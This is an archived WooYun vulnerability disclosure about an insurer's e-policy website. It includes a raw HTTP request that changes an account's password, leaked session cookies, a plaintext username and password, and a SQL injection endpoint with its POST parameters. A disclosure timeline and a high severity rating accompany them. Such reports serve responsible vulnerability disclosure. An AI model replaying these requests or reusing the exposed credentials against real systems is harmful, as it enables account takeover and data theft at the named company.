乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-04: 细节已通知厂商并且等待厂商处理中 2016-01-05: 厂商已经确认,细节仅向厂商公开 2016-01-15: 细节向核心白帽子及相关领域专家公开 2016-01-25: 细节向普通白帽子公开 2016-02-04: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
隔壁的老王偷了我的iPhone 能不能送个。
POst修改密码
POST /changePassword.do HTTP/1.1Host: e-policy.minanins.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://e-policy.minanins.com/changePassword.doCookie: JSESSIONID=E5AD4149368A120747836AF19FA36ABB; BIGipServeryijianxian_web_pool=537004716.16671.0000; CNZZDATA1000420699=641673830-1451845093-http%253A%252F%252Fwww.minanins.com%252F%7C1451845093; ec_username=MA000001; ec_password=epolicy123; pgv_pvid=9813965397X-Forwarded-For: 8.8.8.8Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 65usercode=MA000001&newPassword1=epolicy123&newPassword2=epolicy123
<link href="/css/admin.css" rel="stylesheet" type="text/css"/><link href="/css/theme.css" rel="stylesheet" type="text/css"/><link type="text/css" href="/css/jquery-ui-1.7.1.custom.css" rel="stylesheet" /> <script language="javascript" src="/js/calendar.js"></script><script>function IsDate(mystring) { var reg = /^(\d{4})-(\d{2})-(\d{2})$/; var str = mystring; var arr = reg.exec(str); if(!reg.test(str)&&RegExp.$2<=12&&RegExp.$3<=31) { return false; } else { return true; } } </script><head><title>信息提示</title></head><body><table width="100%" class="pn-ftable" cellpadding="2" cellspacing="1" border="0"> <tr> <td background="images/title_bg1.jpg" colspan="4">信息提示</td></tr></table><table width="100%" class="pn-ftable" cellpadding="2" cellspacing="1" border="0"> <tr> <td class="pn-fbutton" align="center">密码修改成功</td> </tr> <tr> <td class="pn-fbutton" align="center"></td> </tr> </table>
再送一条注入地址POST sql注入漏洞http://e-policy.minanins.com/initInsertPersonOnlineWebservices.doPOST数据:userCode=MA000173&password=98AEA0E1DA79C67BB6D66A564EC015FF&riskPlanCode=1158008
哎 一直没有手机用。
危害等级:高
漏洞Rank:20
确认时间:2016-01-05 09:22
谢谢
暂无